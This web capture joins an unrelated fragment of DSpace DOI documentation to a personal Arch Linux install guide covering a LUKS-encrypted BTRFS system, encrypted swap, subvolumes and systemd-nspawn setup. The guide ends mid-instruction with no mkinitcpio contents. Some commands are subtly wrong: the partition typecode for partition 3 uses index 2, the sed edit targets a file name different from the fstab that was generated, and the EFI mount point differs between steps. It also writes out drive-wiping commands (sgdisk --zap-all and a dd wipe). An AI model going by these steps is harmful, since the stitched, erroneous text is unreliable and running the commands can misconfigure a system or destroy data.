support to generate DOIs for Communities and Collections yet. Adding support for other Registration Agencies If you want DSpace to support other registration agencies, you just have to write a Java class that implements the interface DOIConnector ([dspace-source]/dspace-api/src/main/java/org/dspace/identifier/doi/DOIConnector.java). You might use the DataCiteConnector ([dspace-source]/dspace-api/src/main/java/org/dspace/identifier/doi/DataCiteConnector.java) as an example. After developing your own DOIConnector, you configure DSpace as if you were using the DataCite API directly. Just use your DOIConnector when configuring the IdentifierService instead of the DataCiteConnector. 1 Comment Andrea Schweer There is an open ticket for improving this documentation: DS-2671 - Getting issue details... STATUS - see the comments on that issue for some additional documentation, in particular with regards to item states / terminology.
https://wiki.duraspace.org/display/DSDOC5x/DOI+Digital+Object+Identifier
CC-MAIN-2017-17
refinedweb
2,902
55.54
Hi, I have created a class which I user to create several list of different values. I am them going through all the list to count for frequency of the values. The problem is I want to consider say value1 = 1, value2 = 2, value3 = 3 to be the same as value1 = 2, value2 = 1, value3 = 3 and so on. Now the way I am currently doing it is which a series of if statement which looks at the possibilities so for a my class called pair(below) I would swap the values around to look if they match. With a three value number I would have 5 possibities and so on. I am just curious is there a fast way of seeing if the values match as I want them do without going through a number of If statments? public class MyDictionaryPair : Dictionary<int, Pair> { public void Add(int key, int value1, int value2, decimal weight1, decimal weight2, decimal totalWeight) { Pair val; val.Value1 = value1; val.Weight1 = weight1; val.Value2 = value2; val.Weight2 = weight2; val.TotalWeight = totalWeight; this.Add(key, val); } } Kind Regards
https://www.daniweb.com/programming/software-development/threads/500054/matching-numbers
CC-MAIN-2018-43
refinedweb
183
66.44
matplotlib.cbook.ls_mapper, added ls_mapper_r¶ Formerly, matplotlib.cbook.ls_mapper was a dictionary with the long-form line-style names ( "solid") as keys and the short forms ( "-") as values. This long-to-short mapping is now done by ls_mapper_r, and the short-to-long mapping is done by the ls_mapper. This was done to prevent an Artist that is already associated with an Axes from being moved/added to a different Axes. This was never supported as it causes havoc with the transform stack. The apparent support for this (as it did not raise an exception) was the source of multiple bug reports and questions on SO. For almost all use-cases, the assignment of the axes to an artist should be taken care of by the axes as part of the Axes.add_* method, hence the deprecation of {get,set}_axes. Removing the set_axes method will also remove the 'axes' line from the ACCEPTS kwarg tables (assuming that the removal date gets here before that gets overhauled). Tightened validation so that only {'tip', 'tail', 'mid', and 'middle'} (but any capitalization) are valid values for the 'pivot' kwarg in the Quiver.__init__ (and hence Axes.quiver and plt.quiver which both fully delegate to Quiver). Previously any input matching 'mid.*' would be interpreted as 'middle', 'tip.*' as 'tip' and any string not matching one of those patterns as 'tail'. The value of Quiver.pivot is normalized to be in the set {'tip', 'tail', 'middle'} in Quiver.__init__. Axes.get_children¶ The artist order returned by Axes.get_children did not match the one used by Axes.draw. They now use the same order, as Axes.draw now calls Axes.get_children. The default behaviour of contour() and contourf() when using a masked array is now determined by the new keyword argument corner_mask, or if this is not specified then the new rcParam contour.corner_mask instead. The new default behaviour is equivalent to using corner_mask=True; the previous behaviour can be obtained using corner_mask=False or by changing the rcParam. The example demonstrates the difference. Use of the old contouring algorithm, which is obtained with corner_mask='legacy', is now deprecated. Contour labels may now appear in different places than in earlier versions of Matplotlib. In addition, the keyword argument nchunk now applies to contour() as well as contourf(), and it subdivides the domain into subdomains of exactly nchunk by nchunk quads, whereas previously it was only roughly nchunk by nchunk quads. The C/C++ object that performs contour calculations used to be stored in the public attribute QuadContourSet.Cntr, but is now stored in a private attribute and should not be accessed by end users. This was a bug fix targeted at making the api for Locators more consistent. In the old behavior, only locators of type MaxNLocator have set_params() defined, causing its use on any other Locator to raise an AttributeError ( aside: set_params(args) is a function that sets the parameters of a Locator instance to be as specified within args). The fix involves moving set_params() to the Locator class such that all subtypes will have this function defined. Since each of the Locator subtypes have their own modifiable parameters, a universal set_params() in Locator isn't ideal. Instead, a default no-operation function that raises a warning is implemented in Locator. Subtypes extending Locator will then override with their own implementations. Subtypes that do not have a need for set_params() will fall back onto their parent's implementation, which raises a warning as intended. In the new behavior, Locator instances will not raise an AttributeError when set_params() is called. For Locators that do not implement set_params(), the default implementation in Locator is used. Noneas x or y value in ax.plot¶ Do not allow None as a valid input for the x or y args in ax.plot. This may break some user code, but this was never officially supported (ex documented) and allowing None objects through can lead to confusing exceptions downstream. To create an empty line use ln1, = ax.plot([], [], ...) ln2, = ax.plot([], ...) In either case to update the data in the Line2D object you must update both the x and y data. argsand kwargsfrom MicrosecondLocator.__call__¶ The call signature of __call__() has changed from __call__(self, *args, **kwargs) to __call__(self). This is consistent with the superclass Locator and also all the other Locators derived from this superclass. ValueErrorfor the MicrosecondLocator and YearLocator¶ The MicrosecondLocator and YearLocator objects when called will return an empty list if the axes have no data or the view has no interval. Previously, they raised a ValueError. This is consistent with all the Date Locators. The call signature was OffsetBox.DrawingArea(..., clip=True) but nothing was done with the clip argument. The object did not do any clipping regardless of that parameter. Now the object can and does clip the child Artists if they are set to be clipped. You can turn off the clipping on a per-child basis using child.set_clip_on(False). Add salt to the hash used to determine the id of the clipPath nodes. This is to avoid conflicts when two svg documents with the same clip path are included in the same document (see and ), however this means that the svg output is no longer deterministic if the same figure is saved twice. It is not expected that this will affect any users as the current ids are generated from an md5 hash of properties of the clip path and any user would have a very difficult time anticipating the value of the id. When drawing circle markers above some marker size (previously 6.0) the path used to generate the marker was snapped to pixel centers. However, this ends up distorting the marker away from a circle. By setting the snap threshold to inf snapping is never done on circles. This change broke several tests, but is an improvement. Previously the 'get_position' method on Text would strip away unit information even though the units were still present. There was no inherent need to do this, so it has been changed so that unit data (if present) will be preserved. Essentially a call to 'get_position' will return the exact value from a call to 'set_position'. If you wish to get the old behaviour, then you can use the new method called 'get_unitless_position'. Interactive pan and zoom were previously implemented using a Cartesian-specific algorithm that was not necessarily applicable to custom Axes. Three new private methods, _get_view(), _set_view(), and _set_view_from_bbox(), allow for custom Axes classes to override the pan and zoom algorithms. Implementors of custom Axes who override these methods may provide suitable behaviour for both pan and zoom as well as the view navigation buttons on the interactive toolbars. The spacing commands in mathtext have been changed to more closely match vanilla TeX. The extra space that appeared after subscripts and superscripts has been removed. In #2351 for 1.4.0 the behavior of ['axes points', 'axes pixel', 'figure points', 'figure pixel'] as coordinates was change to no longer wrap for negative values. In 1.4.3 this change was reverted for 'axes points' and 'axes pixel' and in addition caused 'axes fraction' to wrap. For 1.5 the behavior has been reverted to as it was in 1.4.0-1.4.2, no wrapping for any type of coordinate. GraphicsContextBase.set_graylevel¶ The GraphicsContextBase.set_graylevel function has been deprecated in 1.5 and will be removed in 1.6. It has been unused. The GraphicsContextBase.set_foreground could be used instead. The idle_event was broken or missing in most backends and causes spurious warnings in some cases, and its use in creating animations is now obsolete due to the animations module. Therefore code involving it has been removed from all but the wx backend (where it partially works), and its use is deprecated. The animations module may be used instead to create animations. color_cycledeprecated¶ In light of the new property cycling feature, the Axes method set_color_cycle is now deprecated. Calling this method will replace the current property cycle with one that cycles just the given colors. Similarly, the rc parameter axes.color_cycle is also deprecated in lieu of the new axes.prop_cycle parameter. Having both parameters in the same rc file is not recommended as the result cannot be predicted. For compatibility, setting axes.color_cycle will replace the cycler in axes.prop_cycle with a color cycle. Accessing axes.color_cycle will return just the color portion of the property cycle, if it exists. Timeline for removal has not been set. The version of jquery bundled with the webagg backend has been upgraded from 1.7.1 to 1.11.3. If you are using the version of jquery bundled with webagg you will need to update your html files as such - <script src="_static/jquery/js/jquery-1.7.1.min.js"></script> + <script src="_static/jquery/js/jquery-1.11.3.min.js"></script> Imagefrom main namespace¶ Image was imported from PIL/pillow to test if PIL is available, but there is no reason to keep Image in the namespace once the availability has been determined. lodfrom Artist¶ Removed the method set_lod and all references to the attribute _lod as the are not used anywhere else in the code base. It appears to be a feature stub that was never built out. Lenaimages from sample_data¶ The lena.png and lena.jpg images have been removed from Matplotlib's sample_data directory. The images are also no longer available from matplotlib.cbook.get_sample_data. We suggest using matplotlib.cbook.get_sample_data('grace_hopper.png') or matplotlib.cbook.get_sample_data('grace_hopper.jpg') instead. Remove code to allow legend handlers to be callable. They must now implement a method legend_artist. Removed method set_scale. This is now handled via a private method which should not be used directly by users. It is called via Axes.set_{x,y}scale which takes care of ensuring the related changes are also made to the Axes object. Both ipython_console_highlighting and ipython_directive have been moved to IPython. Change your import from 'matplotlib.sphinxext.ipython_directive' to 'IPython.sphinxext.ipython_directive' and from 'matplotlib.sphinxext.ipython_directive' to 'IPython.sphinxext.ipython_directive' 'faceted'as a valid value for shadingin tri.tripcolor¶ Use edgecolor instead. Added validation on shading to only be valid values. facetedkwarg from scatter¶ Remove support for the faceted kwarg. This was deprecated in d48b34288e9651ff95c3b8a071ef5ac5cf50bae7 (2008-04-18!) and replaced by edgecolor. set_colorbarmethod from ScalarMappable¶ Remove set_colorbar method, use colorbar attribute directly. - remove get_proxy_renderermethod from AbstarctPathEffectclass - remove patch_alphaand offset_xyfrom SimplePatchShadow
https://matplotlib.org/api/prev_api_changes/api_changes_1.5.0.html
CC-MAIN-2020-10
refinedweb
1,745
58.48
CodeGuru Forums > Visual C++ & C++ Programming > C++ (Non Visual C++ Issues) > Reading from a file including null character PDA Click to See Complete Forum and Search --> : Reading from a file including null character Kohinoor24 February 1st, 2002, 05:32 AM I have some contents in 1 file.Iam reading that into an other file.But it stops reading when it encounters the null character.Is there any other fuction which reads the entire file if the file contains Null also.I want to read the entire file. I have the following code: const char cCc ={'\x5A'}; const char Length [] = {'\x00','\x00'}; const char IDM[] = {'\xD3','\xAB','\xCA','\x00','\x00','\x00'} ; //*A class class C_ptx { public: C_ptx() { m_ptx.open("First",ios::out|ios::binary); } void Createstream() { m_ptx.write(&cCc,sizeof(cCc)); m_ptx.write(Length,sizeof(Length)); m_ptx.write(IDM,sizeof(IDM)); } ofstream & returnstream() { return m_ptx; } private: ofstream m_ptx; }; */class ends here /*Main Fuction*/ void main() { C_ptx T1; T1.Createstream(); ofstream& s1 =T1.returnstream(); if(!s1.eof()) { s1.seekp(0,ios::end); } int s =s1.tellp(); char *buffer= new char[s]; ifstream r1("First",ios::in|ios::binary); // Here When Iam reading from the "First" file it stops reading when it encounters the null character.Is there any other fuction which reads the entire file if the file contains Null r1.getline(buffer,s); ofstream m_mixeddata("second",ios::out|ios::binary); m_mixeddata.write(buffer,sizeof(buffer)); } Kohinoor NMTop40 February 1st, 2002, 07:45 AM A few things: 1. I think a stream opened for output only is always at eof. I'm not sure you can do seek on it. For that you have to open for write and read. 2. You have not closed your stream before you try to read the same file for input. Although the stream logically knows all the data, it may have buffered some so physically the file either won't open at all or may be incomplete or even empty. 3. You are using text reading functions (getline) for a binary file. You should know, by the way, that the standard streaming functions are all text, although you can write your own for your own classes that output / input binary. All ios::binary does is not convert line endings. (It's annoying because I also thought ios::binary should cause a 4-byte integer to be streamed with 4 bytes). 4. To read from a binary file you may want to use read() member of istream and to write you may want to use write(). 5. You might want to use the flashy istreambuf_iterator< >. This would be done as follows (but doesn't work on Windows for some unknown reason) #include <iterator> #include <fstream> #include <vector> using namespace std; // for illustration convenience ifstream& ifs=getStream(); //(open stream we have somewhere) istreambuf_iterator<char> ifStart( ifs ); istreambuf_iterator<char> ifEnd; vector<char> buffer( ifStart, ifEnd ); if you want to read binary integers, just change <char> to <int> throughout. This workaround that Scott Meyers gives doesn't work for me on Windows either. vector<char> buffer; buffer.reserve( distance( ifStart, ifEnd ) ); // works fine copy( ifStart, ifEnd, back_inserter(buffer) ); // for me this copies nothing (Anyone know if Dinkumware has bug-fixes for this?) The best things come to those who rate NMTop40 February 1st, 2002, 08:19 AM ok this worked: ifs.seekg( 0, ios_base::beg ); after the distance() call, but only with the copy function. Alternative is not to reserve. That means more reallocations but means it doesn't have to move the file pointer as much. You can only do this to read the whole file. If you want to read part of the file, use resize() then read() not copy and back_inserter. (Probably better anyway). The best things come to those who rate Kohinoor24 February 4th, 2002, 01:57 AM I have closed the file as u told and instead of the getline function I used the read function.How can I integerate the flashy iterator code into my code.!!! This is a very important part of code for me as I have to read all data from a file to another if it haves spaces also . I dont know it is reading only up to characters preceding the space in the file. Kohinoor NMTop40 February 4th, 2002, 06:36 AM My code showed you how to load all the contents of a file into memory as a raw vector of chars. Files have structure - now what you need to do is interpret the structure of the file into a class structure. istreambuf_iterator skips over whitespace characters (doesn't interpret them as terminators). I do have to say though that I find BSTR a much nicer format to work with for file I/O. Doesn't rely on terminators/separators If you are working on UNIX you can write your own BSTR-based class to work with for file I/O. (You can do so if working on Windows too and don't want to use ATL, or want to work with 1-byte characters (BSTR is based on Unicode) A BSTR (in COM) is a 4-byte length (binary) followed by the string. The length is number of characters that follows, not number of bytes (which is twice as many), thus the length in bytes is actually 2n+4. Of course, this would make your files not readable or editable in a text-editor. Depends on whether you consider this a good thing or a bad thing. The best things come to those who rate NMTop40 February 4th, 2002, 08:09 AM actually, a BSTR does contain a terminating null character as well, but there can also be embedded nulls. The terminating null is not counted in its length but is always there. However the provided functions of CComBSTR (WriteToStream and ReadFromStream) do not persist these null terminators. You can cast to LPCWSTR but obviously this will go only to the first null, but you can also create wstring from one easily enough as that takes a pointer and a length as one of its constructors. CComBSTR already wraps the class, and although it is not documented it has an operator LPCWSTR which returns the address of the first character if not NULL, and NULL otherwise. The best things come to those who rate manojvibhute September 3rd, 2002, 08:15 AM I think End result wanted is same copy of the file including white spaces and everything. So better use copyfile function to make its copy codeguru.com
http://forums.codeguru.com/archive/index.php/t-180579.html
crawl-003
refinedweb
1,082
62.07
User:Altercation/Bullet Proof Arch Install This page is a summary of the current process I follow when installing Arch on a new laptop or desktop. My process varies over time, but this serves as my "state of the art" best practice recommendations. I'm open to feedback and suggestions for improvements. Contents - 1 Objectives - 2 Assumptions - 3 Prerequisites - 4 Preparation - 5 Partition & Format Drive - 5.1 Understanding some basics about disks, partitions, and filesystems - 5.2 Our partition plans - 5.3 Partition Summary - 5.4 Visual overview of our partitions, filesystems, and contents - 5.5 Partition Drive - 5.6 Format EFI Partition - 5.7 Encrypt System Partition - 5.8 Bring Up Encrypted Swap - 5.9 Create and mount BTRFS subvolumes - 5.10 Mount EFI partition - 6 Installation of Base Arch Linux System - 6.1 Install base package group - 6.2 fstab Generation and Modification - 6.3 Boot into new system - 6.4 Generate and set locale - 6.5 Time and Date - 6.6 Set hostname - 6.7 Network configuration - 6.8 Base Package Installation - 6.9 Initramfs - 6.10 Bootloader - 6.11 Root password - 6.12 Leave the systemd-nspawn environment - 6.13 Legacy boot loader - 7 Command Summary - 8 Quick and Dirty Objectives The goals of my standard "bullet proof" Arch Linux installation are: - Benefit from Arch's rolling release model while mitigating any risk of system corruption or data loss due to failed upgrades - Minimize risk due to hardware failure or total system loss (e.g. theft or physical destruction) - Make system rollbacks easy and procedural, using a standard setup and methodology for recovery of previous system (and user data) states Why not the Arch Install instructions? The Arch Linux installation instructions are an excellent, general starting point and you should read and understand them. That being said, they are designed to map to a very, very broad set of installation scenarios. I am interested in a very specific type of installation (daily use desktops and laptops in this article) and I have a strong set of opinions about the "right" or "best practice" way to set up my own working systems. These instructions, then, are much more prescriptive and have strong suggestions or directions about how (and why) one should use a particular method during Arch Linux installation. Key differences from the stock Arch install instructions How these instructions differ from the standard Arch guidance: - We are encrypting the entire system but not using LVM as is often recommended (see the encryption section below for details about why we are not using it). - I use labels and avoid UUIDs where possible to make switching to an alternate recovery drive easier. - I skip arch-chroot and simply boot the new system (not reboot, just boot) from within the install environment using systemd-nspawn(1) which enables the *ctl commands to work (and systemd services to be enabled properly without need for a system reboot) - I use the various systemd *ctl commands (hostnamectl, timedatectl, localectl, etc.) to configure the system - I use the systemd mkinitcpio hooks in lieu of the legacy hooks. - I use BTRFS exclusively for root and home partitions for its backup capabilities. - I recommend and use secure boot (but not with the Microsoft keys) to minimize risk due to the unavoidably unencrypted EFI partition. Assumptions These instructions presuppose the following: - fairly new hardware (these instructions may work on older hardware, but there may be unusual issues that crop up... if you aren't comfortable handling those situations you should consider a more "traditional" Arch Linux install (e.g. using grub, LVM, ext4, etc.) - UEFI support (BIOS system install is also possible with some modification of these instructions, but this has not yet been detailed here) - probably an SSD. - some familiarity with Arch, or at least some experience with Linux, will help Prerequisites You must have a recent copy of the Arch install USB. See Category:Getting and installing Arch for general information and USB flash installation media for specific details on creating a USB Arch installation drive. You should also have a reasonable amount of time in which to complete the installation. Novice users will want to budget a couple hours. Experienced users will know to budget a couple hours. Preparation Boot from USB Drive Boot your system from your prepared Arch Linux USB drive. It is important that you boot in EFI mode, not legacy BIOS compatibility mode. See the UEFI article for more information about checking boot mode and ensuring you are booting using EFI. Bring up the network If you booted into a system with an ethernet cable plugged in, chances are you're up and running. If you need to use wireless instead, wifi-menu will more often than not work without trouble. If those don't work, see the Arch installation guide section on connecting to the internet. Select Drive I like to use the lsblk command to bring up a quick list of the block devices on the system and identify existing partition structures and sizes, as well as mount points. If you don't already use it, I recommend lsblk when you need information on any given drive or partition. It's useful for polling UUIDs as well. For example, the following command gives you a clearly formatted summary of all block devices, their partition labels, filesystem lables, UUIDs and partition UUIDS: lsblk -o +LABEL,PARTLABEL,UUID,PARTUUID In any case, the plain command without options should be enough to identify the drive you will install to (for example /dev/sda or /dev/nvme0n1: # lsblk Wipe Drive Securely (optional) While it is not necessary, given that this process will go through the trouble of encrypting the main system partition, it makes sense to do a secure wipe of the drive. This is more or less directly from Dm-crypt/Drive preparation#dm-crypt wipe on an empty disk or partition. First, create a temporary encrypted container the full disk ( sdX) to be encrypted, e.g. using default encryption parameters and a random key via the --key-file /dev/{u}random option (see also Random number generation): # cryptsetup open --type plain /dev/sdXY container --key-file /dev/urandom Second, check the container exists: # fdisk -l Disk /dev/mapper/container: XXXX MB, XXXXXXXXXX bytes ... Disk /dev/mapper/container does not contain a valid partition table Wipe the container with zeros. A use of if=/dev/urandom is not required as the encryption cipher itself generates randomness. # dd if=/dev/zero of=/dev/mapper/container status=progress bs=1M dd: writing to ‘/dev/mapper/container’: No space left on device - Using dd with the bs=option, e.g. bs=1Mas above,. Now od can be used to spotcheck whether the wipe overwrote the zeroed sectors, e.g. od -j containersize - blocksizeto view the wipe completed to the end. Finally, close the temporary container: # cryptsetup close container Partition & Format Drive Understanding some basics about disks, partitions, and filesystems Think of your drive like a big empty building, no rooms. This is your plain physical drive (either a spinning platter drive or an SSD). Next imagine that to make it useful, we divide the building into apartments. In our analogy the apartments are partitions of the drive. Imagine also that there are a couple different standard methods of creating layout maps to the apartments. These plans are standardized so that the public services that have to access the building regularly (like the fire and police, for example) understand how to find the apartment entrances. In the world of partitioning, the equivalent is the "partition table scheme". The two common schemes are called "MBR" (Master Boot Record, older) and "GPT" (GUID Partition Table, newer). We will be using the new GPT scheme. Finally, imagine that the apartments are just empty shells. The act of building walls and laying out the functional structure of the apartments is equivalent to formatting our disk partitions with a filesystem. And just as different layouts may be more or less efficient, or have other different functional characteristics, so to filesystems have different attributes that make them useful in different ways. Our partition plans We will take our physical drive and divide it into three partitions. These partitions each serve a distinct purpose. All but the first and smallest, the EFI partition, will be encrypted. For security, if your system supports Secure Boot, you may choose to cryptographically sign the data stored on the EFI partition so that any tampering will be evident, despite the lack of encryption on that partition. We will not be using LVM. You read a lot about LUKS and LVM and it all gets a bit complicated (LVM on LUKS, LUKS on LVM, etc.). LVM is a "logical volume manager" and abstracts physical devices (drives) into virtual devices, for easier management. It's a good idea but we will be using btrfs to effectively achieve the same results and really don't need the overhead of LVM. Partition Summary - 1: EFI - The UEFI 'bios" will look for this FAT32 formatted partition and either locate a default bootloader or will locate a specific EFI boot entry on it. This partition is by necessity not encrypted (unless the drive it is on has been encrypted as a "self encrypting drive") - 2: Swap - Used by Linux to swap out pages of memory from RAM to disk. Despite debate in this area, it is advisable to have at least some swap space, even it you are not planning on using hibernation on your machine. The Arch wiki is unfortunately rather too brief in its own swap article so I recommend the Fedora documentation on swap for a good overview on determining the right swap partition size. - 3: System - This will hold our root and home data. It will be formatted as BTRFS and will use subvolumes to manage snapshots of the current root and home contents. Visual overview of our partitions, filesystems, and contents This is a visual summary of our partions (inc. size information), encryption, filesystems, and a summary of the contents of each container. Partition Drive There are many utilities available for Partitioning. Because we are using Arch Linux and the command line doesn't hurt us (it makes us stronger) we will be using pure, non-interactive command line tools for this. Specifically, we will be using the utility sgdisk from the gptfdisk package. The fdisk utility now also supports GPT partitioned drives, so it would be an alternative. sgdisk is available by default on the standard Arch install iso that you use to make your bootable USB drive. First, select the drive you will install to. Make sure you have selected the correct drive!. Again, a quick lsblk will work here. # DRIVE=/dev/DRIVEID (replace /dev/DRIVEID with the correct value, for example /dev/sda, /dev/nvme0n1, etc.) If you didn't securely wipe the drive already, it's worth "zapping" it using sgdisk to remove any lingering legacy partition information. If you already wiped the drive you can skip this command (though it won't hurt to run it again). # sgdisk --zap-all $DRIVE The following command will then create all three partitions in one go. It will also effectively erase the selected drive! # sgdisk --clear \ --new=1:0:+550MiB --typecode=1:ef00 --change-name=1:EFI \ --new=2:0:+8GiB --typecode=2:8200 --change-name=2:cryptswap \ --new=3:0:0 --typecode=2:8300 --change-name=3:cryptsystem \ $DRIVE It is worth noting that the "--change-name" values are, in this case, creating GPT "partition labels". You can subsequently see these by using the lsblk -o +PARTLABEL command. It is good to use "EFI" for the efi partition. I am not aware of UEFI implementations that actively use the label for identification of the EFI partition, but it is possible that some do (UEFI bios implementations are not always consistent or to spec). The other two names are entirely "arbitrary". There is nothing special about calling them cryptswap and cryptsystem; they are simply good, clear names that remind us of the purpose of this partition and what it contains (for example, "cryptswap" suggests "this partition is for swap, and is encrypted"). One final note about partition labels: we want them to be unique on your system. If for some reason there is already a GPT partition with the name EFI on another drive on your system, either change that partition name or use something besides "EFI" to avoid a namespace collision. Note also, that the backslashes at the end of each line can be omitted if you are writing the command on one long line instead. Those simply allow the splitting of a single command onto multiple lines. Format EFI Partition Next up: format the first (EFI) partition using the (required) FAT32 filesystem. # mkfs.fat -F32 -n EFI /dev/disk/by-partlabel/EFI Note that we here make use of the partition label we just assigned. I prefer doing this since it simplifies scripts significantly for me and makes them, in my opinion, more readable. Encrypt System Partition Encrypt the main partition. Use a good passphrase. Note that the "--align-payload" value has been used as per this suggestion/explanation on the dm-crypt mailing list. Note also that I selected the encryption algorithm and key size using cryptsetup benchmark. See the Dm-crypt/Device_encryption article for more details. # cryptsetup luksFormat --align-payload=8192 -s 256 -c aes-xts-plain64 /dev/disk/by-partlabel/cryptsystem After creating the encrypted container, open it. Again, note the use of the partition label to identify the drive. Additionally, note that once we open this device we are giving it a name of "system." Thus "cryptsystem" is the encrypted system partition, while "system" is the name we are using once it has been opened in an unencrypted state. These names are arbitrary (Linux doesn't care what we use) but they help us keep things organized during this process. # cryptsetup open /dev/disk/by-partlabel/cryptsystem system Bring Up Encrypted Swap Finally we create encrypted swap. In this example we are not enabling hibernation. I will provide information on how to enable hibernation separately. Again, using partition labels to identify the partition and going from "cryptswap" to just "swap". We are not using LUKS here (which effectively makes dm-crypt easier to use). We're just using plain dm-crypt to encrypt the swap partition using a random key. # cryptsetup open --type plain --key-file /dev/urandom /dev/disk/by-partlabel/cryptswap swap # mkswap -L swap /dev/mapper/swap # swapon -L swap Create and mount BTRFS subvolumes Now on to the main attraction: creating our BTRFS subvolume structure. While BTRFS can be set up like any other filesystem (single command, just use the created file system directly), we're going to use the power of BTRFS to enable snapshotting our system state efficiently and rollbacks as necessary. First we create a top-level BTRFS subvolume. Note that the top-level entity in BTRFS nomenclature is still referred to as a subvolume, despite being at the top-level. We will create and mount this subvolume, create some new subvolumes inside it, and then switch to those subvolumes as our proper, mounted filesystems. Doing this will enable us to treat our root filesystem as a snapshotable object. Top-level subvolume creation. # mkfs.btrfs --force --label system /dev/mapper/system Temporarily mount our top-level volume for further subvolume creation. Note that the variable 'o' in this case is our default set of options for any given filesystem mount, while "o_btrfs" are those plus some options specific to btrfs. The default option "x-mount.mkdir" is a neat trick that allows us to skip the creation of directories for mountpoints (they will be created automatically). We assume /mnt as the standard mount point, as in a normal Arch Linux installation. # o=defaults,x-mount.mkdir # o_btrfs=$o,compress=lzo,ssd,noatime Note the use of our filesystem label to mount our subvolume. This is distinct from the partition labels used earlier. See the Arch wiki article on Persistent_block_device_naming for more information. # mount -t btrfs LABEL=system /mnt Now we create the subvolumes which will actually be mounted in our running system: # btrfs subvolume create /mnt/root # btrfs subvolume create /mnt/home # btrfs subvolume create /mnt/snapshots Then we unmount everything... # umount -R /mnt And remount just the subvolumes under our top-level subvolume (which remains unmounted unless we need to do "surgery" and rollback to a previous system system): # mount -t btrfs -o subvol=root,$o_btrfs LABEL=system /mnt Before mounting the home and snapshots subvolumes, let's walk through that command so we understand what it's doing: The 'mount -t btrfs' just specifies that our filesystem is of type BTRFS. This is often not necessary since mount will attempt to identify the filesystem type, but being explicit is often the best strategy with command line utilities, so we identify the type here. We use our previously defined mount options with the $o_btrfs variable and add the additional option "subvol=root" (separating it from our other defaults with a comma, of course). The next part of the command is "LABEL=system". Combined this reads as "mount the filesystem with the 'system' label, and use the 'root' subvolume within that". Finally, all this gets mounted at our install root, which in this case is "/mnt". Now let's pick back up and mount our home and snapshots subvolumes. Note that while the subvolume name is "snapshots", we will mount it at ".snapshots" (note dot prefix for the mount point). This will keep our root directory listing clean but will still make it available at a reasonable mount location. # mount -t btrfs -o subvol=home,$o_btrfs LABEL=system /mnt/home # mount -t btrfs -o subvol=snapshots,$o_btrfs LABEL=system /mnt/.snapshots It it worth noting that in each case we are telling mount to use the same filesystem, namely the one labeled "system". However in each case we are also telling it to look for a different subvolume in that filesystem (via the "subvol=" option). With this done, we can move on to installing the actual system. Mount EFI partition # mount LABEL=EFI /mnt/boot Installation of Base Arch Linux System We are currently running off the Arch installer root filesystem. We will first use the 'pacstrap' utility to start our installation and then we will boot into our new minimal system using systemd-nspawn. Install base package group # pacstrap /mnt base fstab Generation and Modification Create an fstab filesystem table file, using labels (-L) to identify the filesystems. # genfstab -L -p /mnt >> /mnt/etc/fstab I prefer to use labels as this makes the system more portable to a backup drive. You should end up with something that looks pretty close to this: # cat /mnt/etc/fstab # /dev/mapper/system UUID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx LABEL=system / btrfs rw,noatime,compress=lzo,ssd,space_cache,subvolid=257,subvol=/root,subvol=root 0 0 # /dev/mapper/system UUID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx LABEL=system /home btrfs rw,noatime,compress=lzo,ssd,space_cache,subvolid=258,subvol=/home,subvol=home 0 0 # /dev/mapper/system UUID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx LABEL=system /.snapshots btrfs rw,noatime,compress=lzo,ssd,space_cache,subvolid=259,subvol=/snapshots,subvol=snapshots 0 0 # /dev/nvme0n1p1 UUID=xxxx-xxxx LABEL=EFI /boot/EFI vfat rw,relatime,fmask=0022,dmask=0022,codepage=437,iocharset=iso8859-1,shortname=mixed,errors=remount-ro 0 2 # /dev/mapper/swap UUID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx LABEL=swap none swap defaults 0 0 There is one problem, however. Swap will not remount this way (the plain dm-crypt partition with a random key will not have a label when it is recreated on reboot). You will have to change that line from this: LABEL=swap none swap defaults 0 0 to this: /dev/mapper/swap none swap defaults 0 0 This will ensure that the mapped device is opened as swap successfully. The other lines may remain unchanged. Use sed instead As a (scriptable) alternative to the manual editing of your /etc/fstab you could use sed(1) to edit the file in place: # sed -i s+LABEL=swap+/dev/mapper/swap+ /mnt/etc/fstab_labels Boot into new system # systemd-nspawn -bD /mnt This will boot your new base Arch Linux system. After the standard boot messages scroll by you will be presented with a login (enter root and hit enter to login). Generate and set locale Next, edit and uncomment your desired locale(s) from /etc/locale.gen. We use vi in the example below, but you could use a simpler editor such as nano if you wish. vi ... Changing it to (for en_US.UTF-8 as a locale in this example): ... ... Alternately one could simply append a known value to the /etc/locale.gen file: # echo "en_US.UTF-8 UTF-8" >> /etc/locale.gen After either method, one runs the locale-gen command to generate the locale files: # locale-gen Finally we use systemd-firstboot(1) or localectl(1) to set the system locale. Each of these effectively does the same thing which is to simply write to /etc/locale.conf (which can simply be edited directly as per standard Arch install instructions). With systemd-firstboot systemd-firstboot(1) will prompt us for selection from our generated locales. It will only work if there is no assigned system locale. If you wish to make changes afterward you can use localectl(1) # systemd-firstboot --prompt-locale With localectl This is an alternate to using systemd-firstboot --prompt-locale. It may also be used subsequent to that command if further changes to the locale are desired. If you need a reminder of which locales have been installed (during this install or later during system changes), use localectl list-locales: # localectl list-locales en_US.UTF-8 We then use localectl set-locale: # localectl set-locale LANG=en_US.UTF-8 Time and Date Unless you have a reason not to, we'll turn on NTP synchronization. # timedatectl set-ntp 1 Then list timezones and pick one # timedatectl list-timezones ... ... # timedatectl set-timezone America/Los_Angeles Set hostname # hostnamectl set-hostname myhostname See the man page for hostnamectl(1) for other attributes that can be set. You might also add the hostname to hosts(5): /etc/hosts 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost 127.0.1.1 myhostname.localdomain myhostname Use echo for a scriptable solution: # echo "127.0.1.1 myhostname.localdomain myhostname" >> /etc/hosts Network configuration Configure the network for the newly installed environment: see Network configuration. For Wireless configuration, install the iw, wpa_supplicant, and dialog packages, as well as needed firmware packages. Base Package Installation We've already included the base group which is, strictly speaking, all you need to boot a minimal Arch Linux system. At this stage, however, we can install some useful utilities (and Xorg or Wayland, etc.). # pacman -Syu base-devel btrfs-progs iw gptfdisk zsh vim terminus-font Initramfs Creating a new initramfs is usually not required, because mkinitcpio was run on installation of the linux package with pacstrap. However we'll need to make some changes to the hooks used on our system. Additionally, I switched over to using the systemd hooks in mkinitcpio, so that is largely what you'll see in my example below. I recommend making a backup of your /etc/mkinitcpio.conf file first: # mv /etc/mkinitcpio.conf /etc/mkinitcpio.conf.orig and then editing a new file to match the following contents: 